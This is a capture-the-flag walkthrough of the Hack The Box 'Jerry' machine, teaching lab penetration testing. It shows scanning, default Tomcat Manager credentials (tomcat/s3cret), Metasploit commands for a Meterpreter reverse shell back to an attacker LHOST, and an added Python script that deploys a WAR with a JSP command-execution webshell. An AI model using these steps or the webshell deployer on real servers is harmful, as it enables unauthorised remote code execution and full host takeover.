
Jerry

  • Admin
  • Jan 7, 2022
  • 2 min read

Updated: Jul 10, 2023

First, copy the IP address of the target machine from your Hack The Box account. In this walkthrough the target is 10.129.238.159; yours will be different, so substitute it in every command below.


As usual, let's start with nmap, using default scripts (-sC) and version detection (-sV):

nmap -sC -sV 10.129.238.159

Nmap reports the host as down and suggests -Pn. The target is not answering nmap's ping probes, so -Pn skips host discovery and scans the ports anyway. Let's try it:

nmap -sV -Pn 10.129.238.159

Port 8080 is open and the service is Apache Tomcat, so let's open our browser and type the following in the URL bar:

10.129.238.159:8080

We get Tomcat's default landing page.

As usual, let's run gobuster first to enumerate hidden directories on the site. (The -x php flag appends a .php extension to every wordlist entry; on a Java server like Tomcat, .jsp would be the more relevant extension, but the directory hits are what matter here.) Type:

gobuster dir -u http://10.129.238.159:8080 -w /opt/useful/SecLists/Discovery/Web-Content/common.txt -x php

We could look into each of these directories, but the one that stands out is /manager: the Tomcat Manager application, which lets an authenticated user deploy and undeploy web applications. Let's open it in the browser:

10.129.238.159:8080/manager

We are prompted for a login (HTTP Basic authentication). Let's try our luck with admin as the username and admin as the password. We get a 401 Unauthorized error page.

Looks like there are some credentials here. Tomcat's stock 401 page for the manager app includes an example tomcat-users.xml snippet, and it shows a user tomcat with the password s3cret. These are the documentation's example values; they only work if the administrator left them in place.

Let's try to log in again, this time with tomcat and s3cret.

Open the browser and type in the URL bar:

10.129.238.159:8080/manager

But this time we never get the chance to enter our login details and go straight to the error page. The browser cached the rejected admin:admin credentials for this realm and silently resends them in the Authorization header on every request. HTTP Basic authentication does not use cookies, so the cached credentials live for the whole browser session.

Let's clear the browser's cached credentials (clearing cookies alone will not do it), close the browser and try again!

This time we get the login prompt back, so let's enter tomcat as the username and s3cret as the password.

This time we are in!
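The browser trouble above disappears if the credential check is done from the command line. The following is an added example, not code from the original walkthrough: it pulls the example user out of a 401 page body, builds the Authorization header a browser would send (which is exactly what the browser kept resending), and probes the manager's text interface with it. SAMPLE_401_BODY is a constructed fragment modelled on Tomcat's stock manager 401 page; the host, port and credentials are the walkthrough's values; try_manager_login needs network access to the target and is only called from the main block.

```python
"""Check Tomcat manager credentials from the command line.

Added example, not code from the original walkthrough. Host, port and
credentials are the walkthrough's values; SAMPLE_401_BODY is a constructed
fragment modelled on the manager app's stock 401 page.
"""
from __future__ import annotations

import base64
import html
import re
import urllib.error
import urllib.request

# Constructed sample: the part of Tomcat's manager 401 page that embeds an
# example tomcat-users.xml. The real page HTML-escapes the XML, hence &lt; &gt;.
SAMPLE_401_BODY = """
<h1>401 Unauthorized</h1>
<p>You are not authorized to view this page.</p>
<pre>
&lt;role rolename="manager-gui"/&gt;
&lt;user username="tomcat" password="s3cret" roles="manager-gui"/&gt;
</pre>
"""

# Tomcat writes the example with username before password, so a fixed order is enough.
USER_RE = re.compile(r'<user\s+username="([^"]*)"\s+password="([^"]*)"')


def extract_example_users(body: str) -> list[tuple[str, str]]:
    """Return (username, password) pairs from a tomcat-users.xml snippet
    embedded, HTML-escaped, in an error page."""
    return USER_RE.findall(html.unescape(body))


def basic_auth_header(username: str, password: str) -> str:
    """Build the Authorization header value a browser sends for HTTP Basic auth.
    Once a browser has sent this for a realm it resends it on every request for
    the rest of the session, which is why admin:admin kept being submitted."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


def try_manager_login(host: str, port: int, username: str, password: str) -> int:
    """Request /manager/text/list with the credentials and return the HTTP status.
    200: accepted with the manager-script role; 401: rejected;
    403: accepted but the account lacks manager-script (use /manager/html instead)."""
    req = urllib.request.Request(
        f"http://{host}:{port}/manager/text/list",
        headers={"Authorization": basic_auth_header(username, password)},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


if __name__ == "__main__":
    host, port = "10.129.238.159", 8080  # walkthrough's target
    for user, pw in extract_example_users(SAMPLE_401_BODY):
        print(f"{user}:{pw} -> HTTP {try_manager_login(host, port, user, pw)}")
```

Each probe is a fresh request with an explicit header, so a rejected guess cannot poison the next attempt the way the browser's cached admin:admin did.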


Now let's google "Apache Tomcat Reverse Shell" and see what we can find. The first link looks interesting: https://vk9-sec.com/apache-tomcat-manager-war-reverse-shell/

Let's follow the steps in the article. It uses two Metasploit modules: an auxiliary scanner that checks manager credentials (which we already found on the 401 page) and an exploit that deploys a malicious WAR file through the manager to get a shell on the target.


First we need to open Metasploit, so in your terminal type:

msfconsole

search tomcat

As recommended in the article, let's use auxiliary/scanner/http/tomcat_mgr_login, so type:

use auxiliary/scanner/http/tomcat_mgr_login

Type:

show options

For the module to work, we are required to provide the following:

RHOSTS - remote host (the target IP)

RPORT - remote port (8080 here)

set RHOSTS 10.129.238.159

set RPORT 8080

Now let's run the module:

exploit

We get one successful login, with username tomcat and password s3cret. The module's default wordlists include Tomcat's documented example credentials, which is why it finds them without any tuning.


Still following the article, let's look for the second module:

search tomcat_mgr

use exploit/multi/http/tomcat_mgr_upload

show options

We need to provide RHOSTS (remote host) and RPORT (remote port) along with LHOST (local host) and LPORT (local port), the address and port the payload will connect back to.

set RHOSTS 10.129.238.159
set RPORT 8080
set LHOST 10.10.14.10

For LHOST we provide the IP of our own machine on the Hack The Box VPN interface (tun0). You can find it by opening a new terminal window and typing ifconfig (or ip addr).

set LPORT 4444

Now that we have set everything up, let's run the exploit:

exploit

It didn't work! The module has to authenticate to http://10.129.238.159:8080/manager before it can upload anything, and we have not given it a username or password yet.


We found those earlier: username tomcat and password s3cret. Let's set them too:

set HttpPassword s3cret
set HttpUsername tomcat

exploit

Great! The WAR was deployed and we got a Meterpreter session.
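To see what tomcat_mgr_upload just did for us, here is the same attack written out by hand. This is an added example, not code from the original walkthrough or from Metasploit: it builds a WAR containing a JSP that runs a command, PUTs it to the manager's text deploy endpoint, then requests the JSP. The context path /cmd and file name cmd.jsp are arbitrary names chosen for this example; the host, port and credentials are the walkthrough's values. The text interface requires the manager-script role (the Metasploit module uses the HTML upload form, which needs manager-gui), so a 403 means the account can only deploy through /manager/html. The network calls only run from the main block.

```python
"""Manual Tomcat manager WAR deployment (added example, not from the post or Metasploit)."""
from __future__ import annotations

import base64
import io
import sys
import urllib.error
import urllib.parse
import urllib.request
import zipfile

# JSP that runs the "cmd" query parameter under the Tomcat service account.
# On Jerry that account is NT AUTHORITY\SYSTEM. Shell builtins such as "dir"
# must be wrapped: cmd=cmd.exe /c dir
CMD_JSP = r'''<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
'''

# Minimal deployment descriptor; Tomcat serves the JSP via its default JspServlet.
WEB_XML = '''<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0"></web-app>
'''


def build_war(jsp_name: str = "cmd.jsp", jsp_source: str = CMD_JSP) -> bytes:
    """Return a WAR (a zip archive) holding WEB-INF/web.xml and the JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war: bytes) -> list[str]:
    """List the archive members (sanity check before uploading)."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return sorted(z.namelist())


def basic_auth(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def deploy_url(host: str, port: int, context: str) -> str:
    """Manager text-interface deploy endpoint; the WAR goes in the PUT body.
    update=true replaces an application already mounted at that context path."""
    query = urllib.parse.urlencode({"path": context, "update": "true"})
    return f"http://{host}:{port}/manager/text/deploy?{query}"


def deploy_war(host: str, port: int, user: str, password: str, context: str, war: bytes) -> str:
    """PUT the WAR (needs manager-script). Returns Tomcat's one-line status,
    e.g. 'OK - Deployed application at context path /cmd'."""
    req = urllib.request.Request(
        deploy_url(host, port, context), data=war, method="PUT",
        headers={"Authorization": basic_auth(user, password),
                 "Content-Type": "application/octet-stream"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace").strip()


def run_cmd(host: str, port: int, context: str, jsp_name: str, cmd: str) -> str:
    """Call the deployed JSP and return the command's stdout."""
    query = urllib.parse.urlencode({"cmd": cmd})
    with urllib.request.urlopen(f"http://{host}:{port}{context}/{jsp_name}?{query}", timeout=15) as resp:
        return resp.read().decode(errors="replace").strip()


if __name__ == "__main__":
    host, port = "10.129.238.159", 8080      # walkthrough's target
    user, password = "tomcat", "s3cret"       # from the 401 page
    war = build_war()
    print(war_entries(war))
    try:
        print(deploy_war(host, port, user, password, "/cmd", war))
        print(run_cmd(host, port, "/cmd", "cmd.jsp", "whoami"))
    except urllib.error.HTTPError as err:
        # 401: credentials rejected; 403: account lacks manager-script
        print(f"manager returned HTTP {err.code}", file=sys.stderr)
```

The Metasploit module differs only in the transport: it fetches the HTML manager page for its CSRF nonce, posts the WAR through the upload form, and packs a Meterpreter stager instead of this simple command runner. Either way the manager account's upload privilege is the whole vulnerability; no Tomcat bug is involved.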


First, drop into a system command shell:

shell

whoami

We are nt authority\system, the most privileged local account on Windows. Tomcat is running as the LocalSystem service account, so compromising the web application hands us full control of the host with no privilege escalation needed.


cd C:/

Flags are often in the C:\Users\Administrator\Desktop directory, so let's type:

cd C:\Users\Administrator\Desktop

dir

cd flags

dir

type "2 for the price of 1.txt"

We got both the user flag and the root flag from the same file!


Don't forget to copy both flags and submit them in your Hack The Box account to fully own the Jerry machine.


©2025 by My Tech On IT
